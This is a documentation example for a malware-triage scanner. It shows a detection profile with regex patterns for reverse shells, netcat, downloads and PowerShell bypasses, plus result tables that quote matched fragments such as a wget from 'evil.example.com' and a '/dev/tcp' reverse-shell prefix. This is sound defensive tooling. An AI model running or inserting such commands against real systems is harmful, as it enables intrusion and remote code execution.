Example: malware-analysis

Inputs
Profile
Report outputs
- Triage report (converted from triage_report.json)
- CSV outputs

Inputs

examples/inputs/malware-analysis-samples/java_webshell.java
examples/inputs/malware-analysis-samples/powershell_attack.ps1
examples/inputs/malware-analysis-samples/python_malware_patterns.py
examples/inputs/malware-analysis-samples/suspicious_shell_script.sh

Profile

# Malware Analysis Profile
# Profile for analyzing potentially malicious files

decode = ["base64", "hex", "unicode-escape-sequences"]

max-file-size = 104857600  # 100 MiB

include-path-globs = []
exclude-path-globs = []

tag = "malware-analysis"

# Suspicious Shell Commands
[[patterns]]
  name = "wget/curl Download"
  pattern = "(wget|curl)\\s+[^\\s]+"
  type = "regex"

[[patterns]]
  name = "Base64 Decode Command"
  pattern = "base64\\s+-d"
  type = "regex"

[[patterns]]
  name = "Netcat Command"
  pattern = "(nc|netcat|ncat)\\s+-[elvp]"
  type = "regex"

[[patterns]]
  name = "Reverse Shell"
  pattern = "bash\\s+-i\\s+>&\\s*/dev/tcp/"
  type = "regex"

# PowerShell Indicators
[[patterns]]
  name = "PowerShell Encoded Command"
  pattern = "-enc(odedcommand)?\\s+"
  type = "regex"
  case-insensitive = true

[[patterns]]
  name = "PowerShell Download"
  pattern = "Invoke-WebRequest|IWR|wget|curl|DownloadString|DownloadFile"
  type = "regex"
  case-insensitive = true

[[patterns]]
  name = "PowerShell Bypass"
  pattern = "-ep\\s+bypass|-ExecutionPolicy\\s+Bypass"
  type = "regex"
  case-insensitive = true

# Java/Web Shell Indicators
[[patterns]]
  name = "Java Runtime Exec"
  pattern = "Runtime\\.getRuntime\\(\\)\\.exec\\("
  type = "regex"

[[patterns]]
  name = "Process Builder"
  pattern = "new\\s+ProcessBuilder\\("
  type = "regex"

[[patterns]]
  name = "JSP Shell Indicator"
  pattern = "getParameter.*exec|Runtime.*getParameter"
  type = "regex"

# Python Indicators
[[patterns]]
  name = "Python Exec"
  pattern = "(exec|eval)\\s*\\([^)]+\\)"
  type = "regex"

[[patterns]]
  name = "Python Subprocess"
  pattern = "subprocess\\.(call|run|Popen)"
  type = "regex"

[[patterns]]
  name = "Python os.system"
  pattern = "os\\.system\\s*\\("
  type = "regex"

# Obfuscation Indicators
[[patterns]]
  name = "Variable Named Payload"
  pattern = "(payload|shellcode|shell_code)\\s*="
  type = "regex"
  case-insensitive = true

[[patterns]]
  name = "Long Hex String"
  pattern = "[0-9a-fA-F]{64,}"
  type = "regex"

# File Format Signatures (embedded in non-matching files)
[[patterns]]
  name = "Embedded ELF"
  pattern = "7F:45:4C:46"
  type = "bytes"

[[patterns]]
  name = "Embedded PE (MZ)"
  pattern = "4D:5A:90:00"
  type = "bytes"

# Signatures
[[signatures]]
  name = "High Entropy Files (Packed/Encrypted)"
  query = "SELECT sha256 FROM unique_files WHERE shannon_entropy > 7.0"

[[signatures]]
  name = "Small Suspicious Files"
  query = "SELECT sha256 FROM unique_files WHERE file_size < 10000 AND sha256 IN (SELECT sha256 FROM pattern_matches)"

[[signatures]]
  name = "Files with Multiple Indicators"
  query = "SELECT sha256, COUNT(DISTINCT pattern_name) as indicator_count FROM pattern_matches GROUP BY sha256 HAVING indicator_count > 3"

Report outputs

Triage report (converted from triage_report.json)

total_files	7
critical_count	0
high_count	0
medium_count	0
low_count	3
minimal_count	4
must_investigate_count	0
all_scores	None
generated_at	2025-12-03T09:19:43.647661366+00:00

top_scores

file_type	file_type_score	must_investigate	path	pattern_count_score	pattern_matches	pattern_severity_score	reasons	risk_level	score	sha256
Script	20	False	/suspicious_shell_script.sh	15	12	12	["12 suspicious patterns detected"]	Low	47	da2ea4aa42dd635ec5ec51e4d58c45c9cfe68976dafa81726c95e5f1a0a44707
Script	20	False	/python_malware_patterns.py	15	11	11	["11 suspicious patterns detected"]	Low	46	1354f43bdc1c77e91e95b94c9de15be5c2c1e9f58e6708c38a651672aec01620
Script	20	False	/powershell_attack.ps1	10	8	10	["8 suspicious patterns detected"]	Low	40	c2801a05678b65995a653083595d45411aa341a4188475b791aac2568edff2a2
Other	0	False	/suspicious_shell_script.sh/suspicious_shell_script.sh.unicode-escape-sequences	15	12	12	["12 suspicious patterns detected"]	Minimal	27	9e7eb9e4b74588adefb097a18888afa011a98d9e5219a3354a76e60d4d5de15d
Other	0	False	/python_malware_patterns.py/python_malware_patterns.py.unicode-escape-sequences	15	11	11	["11 suspicious patterns detected"]	Minimal	26	ea7385660997b9dc4a76c9467fe3dea1d83f1110961593d5cd38f1d98aa54f0b
Other	0	False	/powershell_attack.ps1/powershell_attack.ps1.unicode-escape-sequences	10	8	10	["8 suspicious patterns detected"]	Minimal	20	f47e6c85d534fb6fc386c20010d04162f66ea1d3d8e2a2d7e13e8364d9e2b9b0
Other	0	False	/java_webshell.java	10	7	9	["7 suspicious patterns detected"]	Minimal	19	048ed5ccb9b83a273c4d2e70076a087616acd54bb9559e957f3a423895ab9701

CSV outputs

errors.csv

Empty CSV

files.csv

path	file_name	sha256	file_created	file_modified	file_accessed	mime_types_from_file_extension	is_decoded_file
/suspicious_shell_script.sh/suspicious_shell_script.sh.unicode-escape-sequences	suspicious_shell_script.sh.unicode-escape-sequences	9e7eb9e4b74588adefb097a18888afa011a98d9e5219a3354a76e60d4d5de15d				[]	1
/suspicious_shell_script.sh	suspicious_shell_script.sh	da2ea4aa42dd635ec5ec51e4d58c45c9cfe68976dafa81726c95e5f1a0a44707	2025-12-03T08:56:20.496889204Z	2025-12-03T08:56:20.496889204Z	2025-12-03T08:56:20.496889204Z	["text/x-shellscript"]	0
/powershell_attack.ps1/powershell_attack.ps1.unicode-escape-sequences	powershell_attack.ps1.unicode-escape-sequences	f47e6c85d534fb6fc386c20010d04162f66ea1d3d8e2a2d7e13e8364d9e2b9b0				[]	1
/python_malware_patterns.py/python_malware_patterns.py.unicode-escape-sequences	python_malware_patterns.py.unicode-escape-sequences	ea7385660997b9dc4a76c9467fe3dea1d83f1110961593d5cd38f1d98aa54f0b				[]	1
/python_malware_patterns.py	python_malware_patterns.py	1354f43bdc1c77e91e95b94c9de15be5c2c1e9f58e6708c38a651672aec01620	2025-12-03T08:56:20.496889204Z	2025-12-03T08:56:20.496889204Z	2025-12-03T08:56:20.496889204Z	["text/x-script.python"]	0
/powershell_attack.ps1	powershell_attack.ps1	c2801a05678b65995a653083595d45411aa341a4188475b791aac2568edff2a2	2025-12-03T08:56:20.496889204Z	2025-12-03T08:56:20.496889204Z	2025-12-03T08:56:20.496889204Z	[]	0
/java_webshell.java	java_webshell.java	048ed5ccb9b83a273c4d2e70076a087616acd54bb9559e957f3a423895ab9701	2025-12-03T08:56:20.496889204Z	2025-12-03T08:56:20.496889204Z	2025-12-03T08:56:20.496889204Z	[]	0

pattern_matches.csv

id	sha256	pattern_name	match_type	match	location	length
1	9e7eb9e4b74588adefb097a18888afa011a98d9e5219a3354a76e60d4d5de15d	wget/curl Download	regex	wget http://evil.example.com/malware.sh	6:0	39
2	9e7eb9e4b74588adefb097a18888afa011a98d9e5219a3354a76e60d4d5de15d	wget/curl Download	regex	curl -O	7:0	7
3	9e7eb9e4b74588adefb097a18888afa011a98d9e5219a3354a76e60d4d5de15d	Base64 Decode Command	regex	base64 -d	10:26	9
4	9e7eb9e4b74588adefb097a18888afa011a98d9e5219a3354a76e60d4d5de15d	Netcat Command	regex	nc -l	13:0	5
5	9e7eb9e4b74588adefb097a18888afa011a98d9e5219a3354a76e60d4d5de15d	Netcat Command	regex	netcat -e	14:0	9
6	9e7eb9e4b74588adefb097a18888afa011a98d9e5219a3354a76e60d4d5de15d	Reverse Shell	regex	bash -i >& /dev/tcp/	17:0	20
7	9e7eb9e4b74588adefb097a18888afa011a98d9e5219a3354a76e60d4d5de15d	PowerShell Download	regex	wget	6:0	4
8	9e7eb9e4b74588adefb097a18888afa011a98d9e5219a3354a76e60d4d5de15d	PowerShell Download	regex	curl	7:0	4
9	9e7eb9e4b74588adefb097a18888afa011a98d9e5219a3354a76e60d4d5de15d	Variable Named Payload	regex	payload=	20:0	8
10	9e7eb9e4b74588adefb097a18888afa011a98d9e5219a3354a76e60d4d5de15d	Variable Named Payload	regex	shellcode=	21:0	10
11	9e7eb9e4b74588adefb097a18888afa011a98d9e5219a3354a76e60d4d5de15d	Variable Named Payload	regex	shell_code =	22:0	12
12	9e7eb9e4b74588adefb097a18888afa011a98d9e5219a3354a76e60d4d5de15d	Long Hex String	regex	4d5a90000300000004000000ffff0000b80000000000000040000000000000004d5a90000300000004000000ffff0000b80000000000000040	25:10	114
13	da2ea4aa42dd635ec5ec51e4d58c45c9cfe68976dafa81726c95e5f1a0a44707	wget/curl Download	regex	wget http://evil.example.com/malware.sh	6:0	39
14	da2ea4aa42dd635ec5ec51e4d58c45c9cfe68976dafa81726c95e5f1a0a44707	wget/curl Download	regex	curl -O	7:0	7
15	da2ea4aa42dd635ec5ec51e4d58c45c9cfe68976dafa81726c95e5f1a0a44707	Base64 Decode Command	regex	base64 -d	10:26	9
16	da2ea4aa42dd635ec5ec51e4d58c45c9cfe68976dafa81726c95e5f1a0a44707	Netcat Command	regex	nc -l	13:0	5
17	da2ea4aa42dd635ec5ec51e4d58c45c9cfe68976dafa81726c95e5f1a0a44707	Netcat Command	regex	netcat -e	14:0	9
18	da2ea4aa42dd635ec5ec51e4d58c45c9cfe68976dafa81726c95e5f1a0a44707	Reverse Shell	regex	bash -i >& /dev/tcp/	17:0	20
19	da2ea4aa42dd635ec5ec51e4d58c45c9cfe68976dafa81726c95e5f1a0a44707	PowerShell Download	regex	wget	6:0	4
20	da2ea4aa42dd635ec5ec51e4d58c45c9cfe68976dafa81726c95e5f1a0a44707	PowerShell Download	regex	curl	7:0	4
21	da2ea4aa42dd635ec5ec51e4d58c45c9cfe68976dafa81726c95e5f1a0a44707	Variable Named Payload	regex	payload=	20:0	8
22	da2ea4aa42dd635ec5ec51e4d58c45c9cfe68976dafa81726c95e5f1a0a44707	Variable Named Payload	regex	shellcode=	21:0	10
23	da2ea4aa42dd635ec5ec51e4d58c45c9cfe68976dafa81726c95e5f1a0a44707	Variable Named Payload	regex	shell_code =	22:0	12
24	da2ea4aa42dd635ec5ec51e4d58c45c9cfe68976dafa81726c95e5f1a0a44707	Long Hex String	regex	4d5a90000300000004000000ffff0000b80000000000000040000000000000004d5a90000300000004000000ffff0000b80000000000000040	25:10	114
25	f47e6c85d534fb6fc386c20010d04162f66ea1d3d8e2a2d7e13e8364d9e2b9b0	PowerShell Encoded Command	regex	-encodedcommand	5:15	16
26	f47e6c85d534fb6fc386c20010d04162f66ea1d3d8e2a2d7e13e8364d9e2b9b0	PowerShell Encoded Command	regex	-enc	6:11	5
27	f47e6c85d534fb6fc386c20010d04162f66ea1d3d8e2a2d7e13e8364d9e2b9b0	PowerShell Download	regex	Invoke-WebRequest	9:0	17
28	f47e6c85d534fb6fc386c20010d04162f66ea1d3d8e2a2d7e13e8364d9e2b9b0	PowerShell Download	regex	IWR	10:0	3
29	f47e6c85d534fb6fc386c20010d04162f66ea1d3d8e2a2d7e13e8364d9e2b9b0	PowerShell Download	regex	DownloadString	11:27	14
30	f47e6c85d534fb6fc386c20010d04162f66ea1d3d8e2a2d7e13e8364d9e2b9b0	PowerShell Download	regex	DownloadFile	12:27	12
31	f47e6c85d534fb6fc386c20010d04162f66ea1d3d8e2a2d7e13e8364d9e2b9b0	PowerShell Bypass	regex	-ep bypass	15:15	10
32	f47e6c85d534fb6fc386c20010d04162f66ea1d3d8e2a2d7e13e8364d9e2b9b0	PowerShell Bypass	regex	-ExecutionPolicy Bypass	16:11	23
33	ea7385660997b9dc4a76c9467fe3dea1d83f1110961593d5cd38f1d98aa54f0b	Python Exec	regex	exec(user_input)	20:0	16
34	ea7385660997b9dc4a76c9467fe3dea1d83f1110961593d5cd38f1d98aa54f0b	Python Exec	regex	eval("__import__('os')	21:0	22
35	ea7385660997b9dc4a76c9467fe3dea1d83f1110961593d5cd38f1d98aa54f0b	Python Exec	regex	exec(decoded)	26:0	13
36	ea7385660997b9dc4a76c9467fe3dea1d83f1110961593d5cd38f1d98aa54f0b	Python Subprocess	regex	subprocess.call	14:0	15
37	ea7385660997b9dc4a76c9467fe3dea1d83f1110961593d5cd38f1d98aa54f0b	Python Subprocess	regex	subprocess.run	15:0	14
38	ea7385660997b9dc4a76c9467fe3dea1d83f1110961593d5cd38f1d98aa54f0b	Python Subprocess	regex	subprocess.Popen	16:0	16
39	ea7385660997b9dc4a76c9467fe3dea1d83f1110961593d5cd38f1d98aa54f0b	Python os.system	regex	os.system(	10:0	10
40	ea7385660997b9dc4a76c9467fe3dea1d83f1110961593d5cd38f1d98aa54f0b	Python os.system	regex	os.system(	11:0	10
41	ea7385660997b9dc4a76c9467fe3dea1d83f1110961593d5cd38f1d98aa54f0b	Variable Named Payload	regex	payload =	24:8	9
42	ea7385660997b9dc4a76c9467fe3dea1d83f1110961593d5cd38f1d98aa54f0b	Variable Named Payload	regex	payload =	29:0	9
43	ea7385660997b9dc4a76c9467fe3dea1d83f1110961593d5cd38f1d98aa54f0b	Variable Named Payload	regex	shellcode =	30:0	11
44	1354f43bdc1c77e91e95b94c9de15be5c2c1e9f58e6708c38a651672aec01620	Python Exec	regex	exec(user_input)	20:0	16
45	1354f43bdc1c77e91e95b94c9de15be5c2c1e9f58e6708c38a651672aec01620	Python Exec	regex	eval("__import__('os')	21:0	22
46	1354f43bdc1c77e91e95b94c9de15be5c2c1e9f58e6708c38a651672aec01620	Python Exec	regex	exec(decoded)	26:0	13
47	1354f43bdc1c77e91e95b94c9de15be5c2c1e9f58e6708c38a651672aec01620	Python Subprocess	regex	subprocess.call	14:0	15
48	1354f43bdc1c77e91e95b94c9de15be5c2c1e9f58e6708c38a651672aec01620	Python Subprocess	regex	subprocess.run	15:0	14
49	1354f43bdc1c77e91e95b94c9de15be5c2c1e9f58e6708c38a651672aec01620	Python Subprocess	regex	subprocess.Popen	16:0	16
50	1354f43bdc1c77e91e95b94c9de15be5c2c1e9f58e6708c38a651672aec01620	Python os.system	regex	os.system(	10:0	10
51	1354f43bdc1c77e91e95b94c9de15be5c2c1e9f58e6708c38a651672aec01620	Python os.system	regex	os.system(	11:0	10
52	1354f43bdc1c77e91e95b94c9de15be5c2c1e9f58e6708c38a651672aec01620	Variable Named Payload	regex	payload =	24:8	9
53	1354f43bdc1c77e91e95b94c9de15be5c2c1e9f58e6708c38a651672aec01620	Variable Named Payload	regex	payload =	29:0	9
54	1354f43bdc1c77e91e95b94c9de15be5c2c1e9f58e6708c38a651672aec01620	Variable Named Payload	regex	shellcode =	30:0	11
55	c2801a05678b65995a653083595d45411aa341a4188475b791aac2568edff2a2	PowerShell Encoded Command	regex	-encodedcommand	5:15	16
56	c2801a05678b65995a653083595d45411aa341a4188475b791aac2568edff2a2	PowerShell Encoded Command	regex	-enc	6:11	5
57	c2801a05678b65995a653083595d45411aa341a4188475b791aac2568edff2a2	PowerShell Download	regex	Invoke-WebRequest	9:0	17
58	c2801a05678b65995a653083595d45411aa341a4188475b791aac2568edff2a2	PowerShell Download	regex	IWR	10:0	3
59	c2801a05678b65995a653083595d45411aa341a4188475b791aac2568edff2a2	PowerShell Download	regex	DownloadString	11:27	14
60	c2801a05678b65995a653083595d45411aa341a4188475b791aac2568edff2a2	PowerShell Download	regex	DownloadFile	12:27	12
61	c2801a05678b65995a653083595d45411aa341a4188475b791aac2568edff2a2	PowerShell Bypass	regex	-ep bypass	15:15	10
62	c2801a05678b65995a653083595d45411aa341a4188475b791aac2568edff2a2	PowerShell Bypass	regex	-ExecutionPolicy Bypass	16:11	23
63	048ed5ccb9b83a273c4d2e70076a087616acd54bb9559e957f3a423895ab9701	Java Runtime Exec	regex	Runtime.getRuntime().exec(	16:24	26
64	048ed5ccb9b83a273c4d2e70076a087616acd54bb9559e957f3a423895ab9701	Java Runtime Exec	regex	Runtime.getRuntime().exec(	25:8	26
65	048ed5ccb9b83a273c4d2e70076a087616acd54bb9559e957f3a423895ab9701	Process Builder	regex	new ProcessBuilder(	21:28	19
66	048ed5ccb9b83a273c4d2e70076a087616acd54bb9559e957f3a423895ab9701	JSP Shell Indicator	regex	getParameter and exec	24:45	21
67	048ed5ccb9b83a273c4d2e70076a087616acd54bb9559e957f3a423895ab9701	JSP Shell Indicator	regex	Runtime.getRuntime().exec(request.getParameter	25:8	46
68	048ed5ccb9b83a273c4d2e70076a087616acd54bb9559e957f3a423895ab9701	Python Exec	regex	exec(cmd)	16:45	9
69	048ed5ccb9b83a273c4d2e70076a087616acd54bb9559e957f3a423895ab9701	Python Exec	regex	exec(request.getParameter("command")	25:29	36

signature_matches.csv

id	signature_name	sha256
1	Small Suspicious Files	048ed5ccb9b83a273c4d2e70076a087616acd54bb9559e957f3a423895ab9701
2	Small Suspicious Files	1354f43bdc1c77e91e95b94c9de15be5c2c1e9f58e6708c38a651672aec01620
3	Small Suspicious Files	9e7eb9e4b74588adefb097a18888afa011a98d9e5219a3354a76e60d4d5de15d
4	Small Suspicious Files	c2801a05678b65995a653083595d45411aa341a4188475b791aac2568edff2a2
5	Small Suspicious Files	da2ea4aa42dd635ec5ec51e4d58c45c9cfe68976dafa81726c95e5f1a0a44707
6	Small Suspicious Files	ea7385660997b9dc4a76c9467fe3dea1d83f1110961593d5cd38f1d98aa54f0b
7	Small Suspicious Files	f47e6c85d534fb6fc386c20010d04162f66ea1d3d8e2a2d7e13e8364d9e2b9b0
8	Files with Multiple Indicators	048ed5ccb9b83a273c4d2e70076a087616acd54bb9559e957f3a423895ab9701
9	Files with Multiple Indicators	1354f43bdc1c77e91e95b94c9de15be5c2c1e9f58e6708c38a651672aec01620
10	Files with Multiple Indicators	9e7eb9e4b74588adefb097a18888afa011a98d9e5219a3354a76e60d4d5de15d
11	Files with Multiple Indicators	da2ea4aa42dd635ec5ec51e4d58c45c9cfe68976dafa81726c95e5f1a0a44707
12	Files with Multiple Indicators	ea7385660997b9dc4a76c9467fe3dea1d83f1110961593d5cd38f1d98aa54f0b

unique_files.csv

sha256	sha1	md5	file_size	mime_type_for_content	shannon_entropy
9e7eb9e4b74588adefb097a18888afa011a98d9e5219a3354a76e60d4d5de15d	668f48403d95b4045624ef0a60a30aa1363fd32b	ed091b801594999629905096f58a118c	740	text/x-shellscript	5.1272899157043
da2ea4aa42dd635ec5ec51e4d58c45c9cfe68976dafa81726c95e5f1a0a44707	7f94d673cd80619cfe1920bc4c7fb3a02e43b6c8	b7b454a5138bc6a75980cb0506567eef	743	text/x-shellscript	5.14450961095171
f47e6c85d534fb6fc386c20010d04162f66ea1d3d8e2a2d7e13e8364d9e2b9b0	0f2f52cbdd818c6903259a9f3e5f75993bdbb34f	cd959f43adf77e2bdcd31201d19c42bc	827	text/plain	5.32534428153232
ea7385660997b9dc4a76c9467fe3dea1d83f1110961593d5cd38f1d98aa54f0b	12bce085224aa646bca31adee3b1e5d7a4948136	257a1291b56b7a26349e1347ce48666a	769	text/x-script.python	5.27674554008029
1354f43bdc1c77e91e95b94c9de15be5c2c1e9f58e6708c38a651672aec01620	12450fd01e050c19d9509e6ddb8e087346a66df3	50d10f7f6c0ea2ec95d6eef88f01233e	774	text/x-script.python	5.29893895886362
c2801a05678b65995a653083595d45411aa341a4188475b791aac2568edff2a2	9e32266cbbd34e3e8b3f6e1dc00c39317ef914b6	53f6f93d22c7386bf1515484a6e746a3	830	text/plain	5.34062167439142
048ed5ccb9b83a273c4d2e70076a087616acd54bb9559e957f3a423895ab9701	3885920b8c21fa39f31bef985f8b864adfb01c1f	b03345873b6adc8dfaf9d57b0fb4ffaa	998	text/plain	4.7078031772999

Keyboard shortcuts

sus - Systematic Universal Scanner - Documentation